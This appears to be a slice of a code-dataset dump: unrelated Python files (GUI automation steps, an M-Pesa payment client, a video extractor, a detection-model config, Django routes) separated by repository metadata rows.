class ClickOnButton(StepBase):
def __init__(self, button, click_num=1, step_name=None, logger=None):
super(ClickOnButton, self).__init__(step_name, logger)
self.require_data(True, "image_loc")
self.button = button
self.click_num = click_num
def execute(self):
super(ClickOnButton, self).execute()
button = pyautogui.locateCenterOnScreen(self.button, confidence=0.9)
for i in range(self.click_num):
pyautogui.click(button[0], button[1])
class Write(StepBase):
def __init__(self, text, enter=False, step_name=None, logger=None):
super(Write, self).__init__(step_name, logger)
self.text = text
self.enter = enter
def execute(self):
super(Write, self).execute()
pyautogui.write(self.text)
if self.enter:
pyautogui.press("enter")
class WaitForLoading(StepBase):
def __init__(self, loading_image, trigger_max=3, step_name=None, logger=None):
super(WaitForLoading, self).__init__(step_name, logger)
self.loading_image = loading_image
self.trigger_max = trigger_max
def execute(self):
super(WaitForLoading, self).execute()
trigger = 0
while trigger < self.trigger_max:
load1 = pyautogui.locateCenterOnScreen("resources/CLO_loading.png", confidence=0.9)
if load1:
self.logger.debug("found loading, waiting...")
trigger = 0
pyautogui.moveTo(load1)
time.sleep(3)
else:
trigger += 1
time.sleep(1)
self.logger.debug(f"Did not find loading, triggering ({trigger} / " f"{self.trigger_max})")
| true | true |
1c4a847fa05d25e7f265a374d27586576fb10671 | 255 | py | Python | aux/engine/actor/__init__.py | bischjer/auxiliary | e42d8a4af43c9bd4d816c03edc2465640635b46b | [
"BSD-3-Clause"
] | null | null | null | aux/engine/actor/__init__.py | bischjer/auxiliary | e42d8a4af43c9bd4d816c03edc2465640635b46b | [
"BSD-3-Clause"
] | null | null | null | aux/engine/actor/__init__.py | bischjer/auxiliary | e42d8a4af43c9bd4d816c03edc2465640635b46b | [
"BSD-3-Clause"
] | null | null | null | from aux.engine.actor.reactor import Reactor
from aux.engine.actor.proactor import Proactor
from aux.engine.actor.coactor import Coactor
__all__ = ['Reactor',
'Proactor',
'Coactor']
class NoActorFoundError(Exception):pass
| 23.181818 | 46 | 0.705882 | from aux.engine.actor.reactor import Reactor
from aux.engine.actor.proactor import Proactor
from aux.engine.actor.coactor import Coactor
__all__ = ['Reactor',
'Proactor',
'Coactor']
class NoActorFoundError(Exception):pass
| true | true |
1c4a849524c22465abea1613bfe918c2849cddd4 | 233 | py | Python | nni/retiarii/trainer/pytorch/__init__.py | qfyin/nni | 59a1ccf8eba68b94974e84fc3834f38d851faf89 | [
"MIT"
] | 3 | 2021-02-23T14:01:43.000Z | 2021-03-29T16:19:32.000Z | nni/retiarii/trainer/pytorch/__init__.py | qfyin/nni | 59a1ccf8eba68b94974e84fc3834f38d851faf89 | [
"MIT"
] | 1 | 2021-01-17T08:53:56.000Z | 2021-01-17T08:53:56.000Z | nni/retiarii/trainer/pytorch/__init__.py | qfyin/nni | 59a1ccf8eba68b94974e84fc3834f38d851faf89 | [
"MIT"
] | 1 | 2020-12-21T11:15:54.000Z | 2020-12-21T11:15:54.000Z | from .base import PyTorchImageClassificationTrainer, PyTorchMultiModelTrainer
from .darts import DartsTrainer
from .enas import EnasTrainer
from .proxyless import ProxylessTrainer
from .random import RandomTrainer, SinglePathTrainer
| 38.833333 | 77 | 0.875536 | from .base import PyTorchImageClassificationTrainer, PyTorchMultiModelTrainer
from .darts import DartsTrainer
from .enas import EnasTrainer
from .proxyless import ProxylessTrainer
from .random import RandomTrainer, SinglePathTrainer
| true | true |
1c4a84b409b74bb514cb2f6f68ddd6f1e2431fe6 | 5,524 | py | Python | build/lib/mpesa/api/mpesa_express.py | Arlus/python-mpesa | 4113d9a59211c05f4c6881965710c4f67a5157b2 | [
"MIT"
] | 26 | 2018-08-02T06:59:50.000Z | 2022-01-15T16:46:39.000Z | build/lib/mpesa/api/mpesa_express.py | Arlus/python-mpesa | 4113d9a59211c05f4c6881965710c4f67a5157b2 | [
"MIT"
] | 1 | 2019-08-17T08:52:23.000Z | 2019-08-17T08:52:23.000Z | build/lib/mpesa/api/mpesa_express.py | Arlus/python-mpesa | 4113d9a59211c05f4c6881965710c4f67a5157b2 | [
"MIT"
] | 38 | 2018-07-26T18:11:18.000Z | 2022-01-02T10:10:54.000Z | import base64
import requests
from .auth import MpesaBase
import datetime
class MpesaExpress(MpesaBase):
def __init__(self, env="sandbox", app_key=None, app_secret=None, sandbox_url=None, live_url=None):
MpesaBase.__init__(self, env, app_key, app_secret, sandbox_url, live_url)
self.authentication_token = self.authenticate()
def stk_push(self, business_shortcode=None, passcode=None, amount=None, callback_url=None, reference_code=None,
phone_number=None, description=None):
"""This method uses Mpesa's Express API to initiate online payment on behalf of a customer..
**Args:**
- business_shortcode (int): The short code of the organization.
- passcode (str): Get from developer portal
- amount (int): The amount being transacted
- callback_url (str): A CallBack URL is a valid secure URL that is used to receive notifications from M-Pesa API.
- reference_code: Account Reference: This is an Alpha-Numeric parameter that is defined by your system as an Identifier of the transaction for CustomerPayBillOnline transaction type.
- phone_number: The Mobile Number to receive the STK Pin Prompt.
- description: This is any additional information/comment that can be sent along with the request from your system. MAX 13 characters
**Returns:**
- CustomerMessage (str):
- CheckoutRequestID (str):
- ResponseDescription (str):
- MerchantRequestID (str):
- ResponseCode (str):
"""
time = str(datetime.datetime.now()).split(".")[0].replace("-", "").replace(" ", "").replace(":", "")
password = "{0}{1}{2}".format(str(business_shortcode), str(passcode), time)
encoded = base64.b64encode(password)
payload = {
"BusinessShortCode": business_shortcode,
"Password": encoded,
"Timestamp": time,
"TransactionType": "CustomerPayBillOnline",
"Amount": amount,
"PartyA": int(phone_number),
"PartyB": business_shortcode,
"PhoneNumber": int(phone_number),
"CallBackURL": callback_url,
"AccountReference": reference_code,
"TransactionDesc": description
}
headers = {'Authorization': 'Bearer {0}'.format(self.authentication_token), 'Content-Type': "application/json"}
if self.env == "production":
base_safaricom_url = self.live_url
else:
base_safaricom_url = self.sandbox_url
saf_url = "{0}{1}".format(base_safaricom_url, "/mpesa/stkpush/v1/processrequest")
r = requests.post(saf_url, headers=headers, json=payload)
return r.json()
def query(self, business_shortcode=None, checkout_request_id=None, passcode=None):
"""This method uses Mpesa's Express API to check the status of a Lipa Na M-Pesa Online Payment..
**Args:**
- business_shortcode (int): This is organizations shortcode (Paybill or Buygoods - A 5 to 6 digit account number) used to identify an organization and receive the transaction.
- checkout_request_id (str): This is a global unique identifier of the processed checkout transaction request.
- passcode (str): Get from developer portal
**Returns:**
- CustomerMessage (str):
- CheckoutRequestID (str):
- ResponseDescription (str):
- MerchantRequestID (str):
- ResponseCode (str):
"""
time = str(datetime.datetime.now()).split(".")[0].replace("-", "").replace(" ", "").replace(":", "")
password = "{0}{1}{2}".format(str(business_shortcode), str(passcode), time)
encoded = base64.b64encode(password)
payload = {
"BusinessShortCode": business_shortcode,
"Password": encoded,
"Timestamp": time,
"CheckoutRequestID": checkout_request_id
}
headers = {'Authorization': 'Bearer {0}'.format(self.authentication_token), 'Content-Type': "application/json"}
if self.env == "production":
base_safaricom_url = self.live_url
else:
base_safaricom_url = self.sandbox_url
saf_url = "{0}{1}".format(base_safaricom_url, "/mpesa/stkpushquery/v1/query")
r = requests.post(saf_url, headers=headers, json=payload)
return r.json()
| 57.541667 | 238 | 0.509051 | import base64
import requests
from .auth import MpesaBase
import datetime
class MpesaExpress(MpesaBase):
def __init__(self, env="sandbox", app_key=None, app_secret=None, sandbox_url=None, live_url=None):
MpesaBase.__init__(self, env, app_key, app_secret, sandbox_url, live_url)
self.authentication_token = self.authenticate()
def stk_push(self, business_shortcode=None, passcode=None, amount=None, callback_url=None, reference_code=None,
phone_number=None, description=None):
time = str(datetime.datetime.now()).split(".")[0].replace("-", "").replace(" ", "").replace(":", "")
password = "{0}{1}{2}".format(str(business_shortcode), str(passcode), time)
encoded = base64.b64encode(password)
payload = {
"BusinessShortCode": business_shortcode,
"Password": encoded,
"Timestamp": time,
"TransactionType": "CustomerPayBillOnline",
"Amount": amount,
"PartyA": int(phone_number),
"PartyB": business_shortcode,
"PhoneNumber": int(phone_number),
"CallBackURL": callback_url,
"AccountReference": reference_code,
"TransactionDesc": description
}
headers = {'Authorization': 'Bearer {0}'.format(self.authentication_token), 'Content-Type': "application/json"}
if self.env == "production":
base_safaricom_url = self.live_url
else:
base_safaricom_url = self.sandbox_url
saf_url = "{0}{1}".format(base_safaricom_url, "/mpesa/stkpush/v1/processrequest")
r = requests.post(saf_url, headers=headers, json=payload)
return r.json()
def query(self, business_shortcode=None, checkout_request_id=None, passcode=None):
time = str(datetime.datetime.now()).split(".")[0].replace("-", "").replace(" ", "").replace(":", "")
password = "{0}{1}{2}".format(str(business_shortcode), str(passcode), time)
encoded = base64.b64encode(password)
payload = {
"BusinessShortCode": business_shortcode,
"Password": encoded,
"Timestamp": time,
"CheckoutRequestID": checkout_request_id
}
headers = {'Authorization': 'Bearer {0}'.format(self.authentication_token), 'Content-Type': "application/json"}
if self.env == "production":
base_safaricom_url = self.live_url
else:
base_safaricom_url = self.sandbox_url
saf_url = "{0}{1}".format(base_safaricom_url, "/mpesa/stkpushquery/v1/query")
r = requests.post(saf_url, headers=headers, json=payload)
return r.json()
| true | true |
1c4a8557b221c053d9b0aaf2d4788aa69102a5c8 | 1,269 | py | Python | yt_dlp/extractor/vidlox.py | mkg20001/yt-dlp | 9518a0a6bed040844d5fd6e29c25328e5949ce94 | [
"Unlicense"
] | 1 | 2021-08-24T17:03:03.000Z | 2021-08-24T17:03:03.000Z | yt_dlp/extractor/vidlox.py | mkg20001/yt-dlp | 9518a0a6bed040844d5fd6e29c25328e5949ce94 | [
"Unlicense"
] | null | null | null | yt_dlp/extractor/vidlox.py | mkg20001/yt-dlp | 9518a0a6bed040844d5fd6e29c25328e5949ce94 | [
"Unlicense"
] | null | null | null | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class VIDLOXIE(InfoExtractor):
IE_NAME = 'vidlox'
_VALID_URL = r'https?://vidlox\.me/(embed-)?(?P<id>[a-z0-9]+).html'
_TEST = {
'url': 'https://vidlox.me/6wq8gciafziz.html',
'info_dict': {
'id': '6wq8gciafziz',
'title': 'md5:74c82229b059846a82628e60dcc661b5',
'ext': 'mp4',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(
'https://vidlox.me/%s.html' % video_id, video_id)
m3u8 = self._search_regex(
r'(https.+m3u8)',
webpage, 'm3u8')
title = self._search_regex(
r'<title>Watch (?P<title>.+)<\/title>',
webpage, 'title', group='title')
thumbnail = self._search_regex(
r'spriteSheetUrl = "(?P<thumbnail>https.+)"',
webpage, 'thumbnail', group='thumbnail')
formats = self._extract_m3u8_formats(m3u8, video_id, ext='mp4')
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'formats': formats,
'thumbnail': thumbnail,
}
| 27.586957 | 71 | 0.547675 | from __future__ import unicode_literals
from .common import InfoExtractor
class VIDLOXIE(InfoExtractor):
IE_NAME = 'vidlox'
_VALID_URL = r'https?://vidlox\.me/(embed-)?(?P<id>[a-z0-9]+).html'
_TEST = {
'url': 'https://vidlox.me/6wq8gciafziz.html',
'info_dict': {
'id': '6wq8gciafziz',
'title': 'md5:74c82229b059846a82628e60dcc661b5',
'ext': 'mp4',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(
'https://vidlox.me/%s.html' % video_id, video_id)
m3u8 = self._search_regex(
r'(https.+m3u8)',
webpage, 'm3u8')
title = self._search_regex(
r'<title>Watch (?P<title>.+)<\/title>',
webpage, 'title', group='title')
thumbnail = self._search_regex(
r'spriteSheetUrl = "(?P<thumbnail>https.+)"',
webpage, 'thumbnail', group='thumbnail')
formats = self._extract_m3u8_formats(m3u8, video_id, ext='mp4')
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'formats': formats,
'thumbnail': thumbnail,
}
| true | true |
1c4a8748112916fe5593eae671d07b4837e59ab3 | 6,115 | py | Python | configs/libra_rcnn/libra_faster_rcnn_r101_fpn_1x.py | Lechatelia/own_mmdet | eac5db1d1bee8eafe0ed46fa4bb61ca8605b502f | [
"Apache-2.0"
] | 24 | 2021-10-14T03:28:28.000Z | 2022-03-29T09:30:04.000Z | configs/libra_rcnn/libra_faster_rcnn_r101_fpn_1x.py | Lechatelia/own_mmdet | eac5db1d1bee8eafe0ed46fa4bb61ca8605b502f | [
"Apache-2.0"
] | 4 | 2021-12-14T15:04:49.000Z | 2022-02-19T09:54:42.000Z | configs/libra_rcnn/libra_faster_rcnn_r101_fpn_1x.py | Lechatelia/own_mmdet | eac5db1d1bee8eafe0ed46fa4bb61ca8605b502f | [
"Apache-2.0"
] | 4 | 2021-10-31T11:23:06.000Z | 2021-12-17T06:38:50.000Z | # model settings
model = dict(
type='FasterRCNN',
pretrained='torchvision://resnet101',
backbone=dict(
type='ResNet',
depth=101,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=[
dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
dict(
type='BFP',
in_channels=256,
num_levels=5,
refine_level=2,
refine_type='non_local')
],
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=81,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(
type='BalancedL1Loss',
alpha=0.5,
gamma=1.5,
beta=1.0,
loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=5,
add_gt_as_proposals=False),
allowed_border=-1,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='CombinedSampler',
num=512,
pos_fraction=0.25,
add_gt_as_proposals=True,
pos_sampler=dict(type='InstanceBalancedPosSampler'),
neg_sampler=dict(
type='IoUBalancedNegSampler',
floor_thr=-1,
floor_fraction=0,
num_bins=3)),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/libra_faster_rcnn_r101_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
| 31.358974 | 79 | 0.559935 | model = dict(
type='FasterRCNN',
pretrained='torchvision://resnet101',
backbone=dict(
type='ResNet',
depth=101,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=[
dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
dict(
type='BFP',
in_channels=256,
num_levels=5,
refine_level=2,
refine_type='non_local')
],
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=81,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(
type='BalancedL1Loss',
alpha=0.5,
gamma=1.5,
beta=1.0,
loss_weight=1.0)))
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=5,
add_gt_as_proposals=False),
allowed_border=-1,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='CombinedSampler',
num=512,
pos_fraction=0.25,
add_gt_as_proposals=True,
pos_sampler=dict(type='InstanceBalancedPosSampler'),
neg_sampler=dict(
type='IoUBalancedNegSampler',
floor_thr=-1,
floor_fraction=0,
num_bins=3)),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100)
)
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
])
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/libra_faster_rcnn_r101_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
| true | true |
1c4a87f8e649f8a5932c3165dddf9b3f0aeca3cc | 880 | py | Python | mi/dataset/driver/ctdmo_ghqr/sio/test/test_ctdmo_ghqr_sio_telemetered_driver.py | cdobs/mi-instrument | 99f9322a4afabc5dff9b0fad12166075efce838c | [
"BSD-2-Clause"
] | 1 | 2018-09-14T23:28:29.000Z | 2018-09-14T23:28:29.000Z | mi/dataset/driver/ctdmo_ghqr/sio/test/test_ctdmo_ghqr_sio_telemetered_driver.py | cdobs/mi-instrument | 99f9322a4afabc5dff9b0fad12166075efce838c | [
"BSD-2-Clause"
] | 33 | 2017-04-25T19:53:45.000Z | 2022-03-18T17:42:18.000Z | mi/dataset/driver/ctdmo_ghqr/sio/test/test_ctdmo_ghqr_sio_telemetered_driver.py | cdobs/mi-instrument | 99f9322a4afabc5dff9b0fad12166075efce838c | [
"BSD-2-Clause"
] | 31 | 2015-03-04T01:01:09.000Z | 2020-10-28T14:42:12.000Z | import os
import unittest
from mi.core.log import get_logger
from mi.dataset.dataset_driver import ParticleDataHandler
from mi.dataset.driver.ctdmo_ghqr.sio.ctdmo_ghqr_sio_telemetered_driver import parse
from mi.dataset.driver.ctdmo_ghqr.sio.resource import RESOURCE_PATH
__author__ = 'mworden'
log = get_logger()
class SampleTest(unittest.TestCase):
def test_one(self):
source_file_path = os.path.join(RESOURCE_PATH, 'node59p1_3.ctdmo.dat')
particle_data_handler = ParticleDataHandler()
particle_data_handler = parse(None, source_file_path, particle_data_handler)
log.debug("SAMPLES: %s", particle_data_handler._samples)
log.debug("FAILURE: %s", particle_data_handler._failure)
self.assertEquals(particle_data_handler._failure, False)
if __name__ == '__main__':
test = SampleTest('test_one')
test.test_one()
| 28.387097 | 84 | 0.761364 | import os
import unittest
from mi.core.log import get_logger
from mi.dataset.dataset_driver import ParticleDataHandler
from mi.dataset.driver.ctdmo_ghqr.sio.ctdmo_ghqr_sio_telemetered_driver import parse
from mi.dataset.driver.ctdmo_ghqr.sio.resource import RESOURCE_PATH
__author__ = 'mworden'
log = get_logger()
class SampleTest(unittest.TestCase):
def test_one(self):
source_file_path = os.path.join(RESOURCE_PATH, 'node59p1_3.ctdmo.dat')
particle_data_handler = ParticleDataHandler()
particle_data_handler = parse(None, source_file_path, particle_data_handler)
log.debug("SAMPLES: %s", particle_data_handler._samples)
log.debug("FAILURE: %s", particle_data_handler._failure)
self.assertEquals(particle_data_handler._failure, False)
if __name__ == '__main__':
test = SampleTest('test_one')
test.test_one()
| true | true |
1c4a898f084e68f38241c7b658081be92d7a651f | 949 | py | Python | examples/01/b.py | cjrh/aiosmartsock | a4ab5ffe5b673ada2a3002d7a9cb68ee1ea4a48f | [
"Apache-2.0"
] | 9 | 2019-03-25T23:25:08.000Z | 2022-01-17T00:49:26.000Z | examples/01/b.py | cjrh/aiomsg | 74b646675e3d7296f0334d3e17c1be0370c5d852 | [
"Apache-2.0"
] | 33 | 2019-04-13T02:31:07.000Z | 2022-03-21T19:12:14.000Z | examples/01/b.py | cjrh/aiosmartsock | a4ab5ffe5b673ada2a3002d7a9cb68ee1ea4a48f | [
"Apache-2.0"
] | 1 | 2021-04-26T09:07:36.000Z | 2021-04-26T09:07:36.000Z | import logging
import asyncio
import aiomsg
import random
from colorama import init, Fore, Style
init()
logging.basicConfig(level="DEBUG")
async def main():
s = aiomsg.Søcket()
await s.connect()
async def r():
while True:
print("waiting for response...")
msg = await s.recv_string()
print(Fore.GREEN + f"Got back {msg}" + Style.RESET_ALL)
# assert msg == 'CALEB'
t = loop.create_task(r())
try:
while True:
print("sending...")
await s.send_string(Fore.BLUE + "caleb" + Style.RESET_ALL)
await asyncio.sleep(random.randint(0, 30))
except asyncio.CancelledError:
t.cancel()
await t
if __name__ == "__main__":
loop = asyncio.get_event_loop()
m = loop.create_task(main())
try:
loop.run_forever()
except KeyboardInterrupt:
pass
m.cancel()
loop.run_until_complete(m)
| 21.088889 | 70 | 0.591149 | import logging
import asyncio
import aiomsg
import random
from colorama import init, Fore, Style
init()
logging.basicConfig(level="DEBUG")
async def main():
s = aiomsg.Søcket()
await s.connect()
async def r():
while True:
print("waiting for response...")
msg = await s.recv_string()
print(Fore.GREEN + f"Got back {msg}" + Style.RESET_ALL)
t = loop.create_task(r())
try:
while True:
print("sending...")
await s.send_string(Fore.BLUE + "caleb" + Style.RESET_ALL)
await asyncio.sleep(random.randint(0, 30))
except asyncio.CancelledError:
t.cancel()
await t
if __name__ == "__main__":
loop = asyncio.get_event_loop()
m = loop.create_task(main())
try:
loop.run_forever()
except KeyboardInterrupt:
pass
m.cancel()
loop.run_until_complete(m)
| true | true |
1c4a8a9465c9765af917e68961daf41b5e99fd15 | 1,270 | py | Python | backend/api/urls.py | ChristchurchCityWeightlifting/lifter-api | a82b79c75106e7f4f8ea4b4e3e12d727213445e3 | [
"MIT"
] | null | null | null | backend/api/urls.py | ChristchurchCityWeightlifting/lifter-api | a82b79c75106e7f4f8ea4b4e3e12d727213445e3 | [
"MIT"
] | 5 | 2022-03-07T08:30:47.000Z | 2022-03-22T09:15:52.000Z | backend/api/urls.py | ChristchurchCityWeightlifting/lifter-api | a82b79c75106e7f4f8ea4b4e3e12d727213445e3 | [
"MIT"
] | null | null | null | from django.urls import include, path
from rest_framework.routers import DefaultRouter
from rest_framework_nested.routers import NestedDefaultRouter
from api.views import AthleteViewSet, CompetitionViewSet, LiftViewSet, SessionViewSet
router = DefaultRouter(trailing_slash=False)
router.register(r"athletes", AthleteViewSet, "athletes")
router.register(r"competitions", CompetitionViewSet, "competitions")
# /athletes/<athlete pk>
# /competitions/<competition pk>
competitions_router = NestedDefaultRouter(
router, r"competitions", lookup="competitions"
)
competitions_router.register(
r"sessions", SessionViewSet, basename="competition-sessions"
)
# /competitions/<competition pk>/session/<session number>
sessions_router = NestedDefaultRouter(
competitions_router, r"sessions", lookup="sessions"
)
sessions_router.register(r"lifts", LiftViewSet, basename="session-lifts")
# /competitions/<competition pk>/sessions/<session number>/lifts/<lift pk>
urlpatterns = [
path("auth/", include("dj_rest_auth.urls")),
# path("auth/registration/", include("dj_rest_auth.registration.urls")), # block registration for now
path("", include(router.urls)),
path("", include(competitions_router.urls)),
path("", include(sessions_router.urls)),
]
| 36.285714 | 105 | 0.774803 | from django.urls import include, path
from rest_framework.routers import DefaultRouter
from rest_framework_nested.routers import NestedDefaultRouter
from api.views import AthleteViewSet, CompetitionViewSet, LiftViewSet, SessionViewSet
router = DefaultRouter(trailing_slash=False)
router.register(r"athletes", AthleteViewSet, "athletes")
router.register(r"competitions", CompetitionViewSet, "competitions")
competitions_router = NestedDefaultRouter(
router, r"competitions", lookup="competitions"
)
competitions_router.register(
r"sessions", SessionViewSet, basename="competition-sessions"
)
sessions_router = NestedDefaultRouter(
competitions_router, r"sessions", lookup="sessions"
)
sessions_router.register(r"lifts", LiftViewSet, basename="session-lifts")
urlpatterns = [
path("auth/", include("dj_rest_auth.urls")),
path("", include(router.urls)),
path("", include(competitions_router.urls)),
path("", include(sessions_router.urls)),
]
| true | true |
1c4a8b2d6e2959ac7dd63a901ca4ffa691691f85 | 21,419 | py | Python | parlalize/utils.py | VesterDe/parlalize | b725fe4b55b95f2ad3505aa70dac2474269ea3da | [
"Unlicense"
